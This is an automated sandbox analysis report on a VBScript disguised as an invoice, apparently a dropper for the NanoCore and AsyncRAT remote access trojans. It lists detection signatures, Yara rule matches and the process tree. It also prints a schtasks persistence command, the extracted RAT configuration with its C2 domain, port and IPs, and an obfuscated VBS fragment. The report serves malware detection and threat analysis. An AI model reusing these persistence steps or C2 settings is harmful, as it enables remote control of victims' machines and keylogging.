Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Invoice No F1019855_PDF.vbs

Overview

General Information

Sample Name:Invoice No F1019855_PDF.vbs
Analysis ID:404165
MD5:ce4dcec84bfeba49404fa70f5d137645
SHA1:c31021953c59af126d0095bea70c26ca02a2d954
SHA256:ca85b069b028fc30a2af436344eae332ad6afe8a7e3904a48ee63948ab6c3133
Tags:NanoCoreRATvbs
Infos:

Most interesting Screenshot:

Detection

Nanocore AsyncRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: NanoCore
VBScript performs obfuscated calls to suspicious functions
Yara detected AsyncRAT
Yara detected Nanocore RAT
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Potential malicious VBS script found (has network functionality)
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 6428 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Invoice No F1019855_PDF.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • ame.exe (PID: 6592 cmdline: 'C:\Users\user\AppData\Local\Temp\ame.exe' MD5: F7F64EC1756119F19D52FB140E22382F)
      • wscript.exe (PID: 6700 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\tmp4DD8.tmp.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
        • schtasks.exe (PID: 5544 cmdline: 'C:\Windows\System32\schtasks.exe' /create /sc onlogon /rl highest /tn Notepads.exe /tr 'C:\Users\user\AppData\Roaming\Notepads.exe MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
          • conhost.exe (PID: 5564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • Notepads.exe (PID: 5444 cmdline: 'C:\Users\user\AppData\Roaming\Notepads.exe' MD5: F7F64EC1756119F19D52FB140E22382F)
    • fi.exe (PID: 6616 cmdline: 'C:\Users\user\AppData\Local\Temp\fi.exe' MD5: 86A588C5A10A04AF998DBAD9FF9A31D1)
  • dhcpmon.exe (PID: 6952 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: 86A588C5A10A04AF998DBAD9FF9A31D1)
  • Notepads.exe (PID: 2152 cmdline: C:\Users\user\AppData\Roaming\Notepads.exe MD5: F7F64EC1756119F19D52FB140E22382F)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "ac555290-50d4-4120-9390-e76e4f94", "Group": "Start Up", "Domain1": "sys2021.linkpc.net", "Domain2": "", "Port": 11940, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4ibx53ALvuTHC2wskqA=="}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\fi.exeNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x1018d:$x1: NanoCore.ClientPluginHost
  • 0x101ca:$x2: IClientNetworkHost
  • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
C:\Users\user\AppData\Local\Temp\fi.exeNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0xff05:$x1: NanoCore Client.exe
  • 0x1018d:$x2: NanoCore.ClientPluginHost
  • 0x117c6:$s1: PluginCommand
  • 0x117ba:$s2: FileCommand
  • 0x1266b:$s3: PipeExists
  • 0x18422:$s4: PipeCreated
  • 0x101b7:$s5: IClientLoggingHost
C:\Users\user\AppData\Local\Temp\fi.exeJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    C:\Users\user\AppData\Local\Temp\fi.exeNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0xfef5:$a: NanoCore
    • 0xff05:$a: NanoCore
    • 0x10139:$a: NanoCore
    • 0x1014d:$a: NanoCore
    • 0x1018d:$a: NanoCore
    • 0xff54:$b: ClientPlugin
    • 0x10156:$b: ClientPlugin
    • 0x10196:$b: ClientPlugin
    • 0x1007b:$c: ProjectData
    • 0x10a82:$d: DESCrypto
    • 0x1844e:$e: KeepAlive
    • 0x1643c:$g: LogClientMessage
    • 0x12637:$i: get_Connected
    • 0x10db8:$j: #=q
    • 0x10de8:$j: #=q
    • 0x10e04:$j: #=q
    • 0x10e34:$j: #=q
    • 0x10e50:$j: #=q
    • 0x10e6c:$j: #=q
    • 0x10e9c:$j: #=q
    • 0x10eb8:$j: #=q
    C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0x1018d:$x1: NanoCore.ClientPluginHost
    • 0x101ca:$x2: IClientNetworkHost
    • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    Click to see the 5 entries

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0x1014d:$x1: NanoCore.ClientPluginHost
    • 0x1018a:$x2: IClientNetworkHost
    • 0x13cbd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
      • 0xfeb5:$a: NanoCore
      • 0xfec5:$a: NanoCore
      • 0x100f9:$a: NanoCore
      • 0x1010d:$a: NanoCore
      • 0x1014d:$a: NanoCore
      • 0xff14:$b: ClientPlugin
      • 0x10116:$b: ClientPlugin
      • 0x10156:$b: ClientPlugin
      • 0x1003b:$c: ProjectData
      • 0x10a42:$d: DESCrypto
      • 0x1840e:$e: KeepAlive
      • 0x163fc:$g: LogClientMessage
      • 0x125f7:$i: get_Connected
      • 0x10d78:$j: #=q
      • 0x10da8:$j: #=q
      • 0x10dc4:$j: #=q
      • 0x10df4:$j: #=q
      • 0x10e10:$j: #=q
      • 0x10e2c:$j: #=q
      • 0x10e5c:$j: #=q
      • 0x10e78:$j: #=q
      00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x1021d:$x1: NanoCore.ClientPluginHost
      • 0x1025a:$x2: IClientNetworkHost
      • 0x13d8d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
      00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
        Click to see the 52 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        7.2.dhcpmon.exe.424e434.4.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
        • 0xd9ad:$x1: NanoCore.ClientPluginHost
        • 0xd9da:$x2: IClientNetworkHost
        7.2.dhcpmon.exe.424e434.4.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
        • 0xd9ad:$x2: NanoCore.ClientPluginHost
        • 0xea88:$s4: PipeCreated
        • 0xd9c7:$s5: IClientLoggingHost
        7.2.dhcpmon.exe.424e434.4.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
          3.0.ame.exe.500000.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
            1.2.wscript.exe.16c170d0090.5.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
            • 0xe38d:$x1: NanoCore.ClientPluginHost
            • 0xe3ca:$x2: IClientNetworkHost
            • 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
            Click to see the 72 entries

            Sigma Overview

            AV Detection:

            barindex
            Sigma detected: NanoCoreShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\fi.exe, ProcessId: 6616, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

            E-Banking Fraud:

            barindex
            Sigma detected: NanoCoreShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\fi.exe, ProcessId: 6616, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

            System Summary:

            barindex
            Sigma detected: WScript or CScript DropperShow sources
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community: Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\tmp4DD8.tmp.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\tmp4DD8.tmp.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: 'C:\Users\user\AppData\Local\Temp\ame.exe' , ParentImage: C:\Users\user\AppData\Local\Temp\ame.exe, ParentProcessId: 6592, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\tmp4DD8.tmp.vbs' , ProcessId: 6700

            Stealing of Sensitive Information:

            barindex
            Sigma detected: NanoCoreShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\fi.exe, ProcessId: 6616, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

            Remote Access Functionality:

            barindex
            Sigma detected: NanoCoreShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\fi.exe, ProcessId: 6616, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Roaming\Notepads.exeAvira: detection malicious, Label: TR/Dropper.Gen
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeAvira: detection malicious, Label: TR/Dropper.MSIL.Gen7
            Source: C:\Users\user\AppData\Local\Temp\ame.exeAvira: detection malicious, Label: TR/Dropper.Gen
            Source: C:\Users\user\AppData\Local\Temp\fi.exeAvira: detection malicious, Label: TR/Dropper.MSIL.Gen7
            Found malware configurationShow sources
            Source: 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "ac555290-50d4-4120-9390-e76e4f94", "Group": "Start Up", "Domain1": "sys2021.linkpc.net", "Domain2": "", "Port": 11940, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4ibx53ALvuTHC2wskqA=="}
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeVirustotal: Detection: 81%Perma Link
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeMetadefender: Detection: 90%Perma Link
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeReversingLabs: Detection: 100%
            Source: C:\Users\user\AppData\Local\Temp\ame.exeVirustotal: Detection: 62%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\ame.exeReversingLabs: Detection: 75%
            Source: C:\Users\user\AppData\Local\Temp\fi.exeVirustotal: Detection: 81%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\fi.exeMetadefender: Detection: 90%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\fi.exeReversingLabs: Detection: 100%
            Source: C:\Users\user\AppData\Roaming\Notepads.exeReversingLabs: Detection: 75%
            Multi AV Scanner detection for submitted fileShow sources
            Source: Invoice No F1019855_PDF.vbsVirustotal: Detection: 29%Perma Link
            Source: Invoice No F1019855_PDF.vbsReversingLabs: Detection: 23%
            Yara detected Nanocore RATShow sources
            Source: Yara matchFile source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.375293411.0000000004201000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.599666904.000000000381A000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: fi.exe PID: 6616, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPED
            Source: Yara matchFile source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
            Source: Yara matchFile source: 7.2.dhcpmon.exe.424e434.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.4f70000.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.382e434.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.382e434.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.dhcpmon.exe.424e434.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.dhcpmon.exe.4252a5d.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.3832a5d.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.4f70000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.4f74629.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPE
            Machine Learning detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Roaming\Notepads.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\ame.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\fi.exeJoe Sandbox ML: detected
            Source: 7.2.dhcpmon.exe.c40000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
            Source: 7.0.dhcpmon.exe.c40000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
            Source: 3.0.ame.exe.500000.0.unpackAvira: Label: TR/Dropper.Gen
            Source: 26.0.Notepads.exe.ee0000.0.unpackAvira: Label: TR/Dropper.Gen
            Source: 30.0.Notepads.exe.f40000.0.unpackAvira: Label: TR/Dropper.Gen
            Source: 4.2.fi.exe.4f70000.10.unpackAvira: Label: TR/NanoCore.fadte
            Source: 4.0.fi.exe.40000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
            Source: 4.2.fi.exe.40000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
            Source: C:\Users\user\AppData\Local\Temp\fi.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
            Source: Binary string: mscorrc.pdb source: fi.exe, 00000004.00000002.600584281.0000000004C80000.00000002.00000001.sdmp

            Networking:

            barindex
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs:
            Source: Malware configuration extractorURLs: sys2021.linkpc.net
            Connects to many ports of the same IP (likely port scanning)Show sources
            Source: global trafficTCP traffic: 79.137.109.121 ports 10090,0,1,4,9,11940
            Potential malicious VBS script found (has network functionality)Show sources
            Source: Initial file: zwLVbUFwZBZDbceUVAyKvSBZdGeuAMSuHWmohNPWzxPYjBKvHpkhxtBhvlsVpKwMjfvEpqnIkbKy.SaveToFile McuWOdLbqYeOPYiwaFEVWWSHoCSCcVdBKrzPZgVwoyASExZvjebwLKVpJnhMKIyUvcEXZTWtkIgY, JOszibYTglCXKYlUnHXtDSXmFsBPOvOQNEqqQpHaihrCgJSzpLUmlsiqrFtpZIElXmJGhvEx
            Source: global trafficTCP traffic: 192.168.2.6:49716 -> 79.137.109.121:11940
            Source: global trafficTCP traffic: 192.168.2.6:49725 -> 191.96.25.26:11940
            Source: Joe Sandbox ViewIP Address: 79.137.109.121 79.137.109.121
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownDNS traffic detected: queries for: sys2021.linkpc.net
            Source: ame.exe, 00000003.00000002.537233135.0000000002BC0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected AsyncRATShow sources
            Source: Yara matchFile source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.325883789.0000016C16535000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.547269938.0000000012956000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.329227770.0000000000502000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000000.533439085.0000000000EE2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.592748395.0000000000EE2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.575722228.0000000000F42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.325568596.0000016C16534000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000000.540116031.0000000000F42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.533753846.0000000000502000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ame.exe PID: 6592, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Notepads.exe PID: 5444, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Notepads.exe PID: 2152, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Notepads.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\ame.exe, type: DROPPED
            Source: Yara matchFile source: 3.0.ame.exe.500000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c1711f630.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.0.Notepads.exe.ee0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c1711f630.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.ame.exe.129567e0.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 30.0.Notepads.exe.f40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 30.2.Notepads.exe.f40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.Notepads.exe.ee0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.ame.exe.500000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.3.wscript.exe.16c165eefd0.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.ame.exe.129567e0.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE
            Contains functionality to log keystrokes (.Net Source)Show sources
            Source: ame.exe.1.dr, Client/Handle_Packet/HandleLimeLogger.cs.Net Code: KeyboardLayout
            Source: Notepads.exe.3.dr, Client/Handle_Packet/HandleLimeLogger.cs.Net Code: KeyboardLayout
            Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleLimeLogger.cs.Net Code: KeyboardLayout
            Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleLimeLogger.cs.Net Code: KeyboardLayout
            Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleLimeLogger.cs.Net Code: KeyboardLayout
            Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleLimeLogger.cs.Net Code: KeyboardLayout
            Source: fi.exe, 00000004.00000002.594266413.0000000000808000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
            Source: fi.exe, 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices

            E-Banking Fraud:

            barindex
            Yara detected Nanocore RATShow sources
            Source: Yara matchFile source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.375293411.0000000004201000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.599666904.000000000381A000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: fi.exe PID: 6616, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPED
            Source: Yara matchFile source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
            Source: Yara matchFile source: 7.2.dhcpmon.exe.424e434.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.4f70000.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.382e434.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.382e434.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.dhcpmon.exe.424e434.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.dhcpmon.exe.4252a5d.2.raw.unpack, type: UNPACKEDPE
